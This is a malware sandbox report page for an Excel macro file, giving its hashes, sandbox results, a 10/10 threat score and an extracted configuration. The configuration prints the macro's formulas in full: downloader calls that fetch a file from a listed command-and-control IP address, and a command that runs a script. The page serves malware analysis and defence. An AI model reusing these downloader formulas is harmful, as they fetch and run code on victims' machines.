d614c0358c26a9b8dded05227a6235b9 | Triage

Submit
Reports

Overview

overview

Static

static

d614c0358c...9.xlsm

windows7-x64

d614c0358c...9.xlsm

windows10-2004-x64

1

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

d614c0358c26a9b8dded05227a6235b9.xlsm

Resource

win7-20231129-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

d614c0358c26a9b8dded05227a6235b9.xlsm

Resource

win10v2004-20240226-en

windows10-2004-x64

0 signatures

150 seconds

General

Target

d614c0358c26a9b8dded05227a6235b9
Size

6KB
MD5

d614c0358c26a9b8dded05227a6235b9
SHA1

e9195d7d882d0dc59c3310ad59fc13b0ba02be28
SHA256

9b7b8df531a90892c0daf0cf84ef0afe3f09ea443ba9d39ac6e0322c842dd669
SHA512

b8b340e5ce056a53c03ad7467adcb286f2c614457d1fa8ee4a964f89e67c11a5fc835520ce0b27789f146c2aabd610abd760b085848fce0359b7b5aae328530f
SSDEEP

192:NDSjuSRbrA2OmmfRY8UhHFBFYuWb98y59+c:NYuiM2wK1FY7b98y55

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

d614c0358c26a9b8dded05227a6235b9
.xlsm office2007

© 2018-2025

Terms | Privacy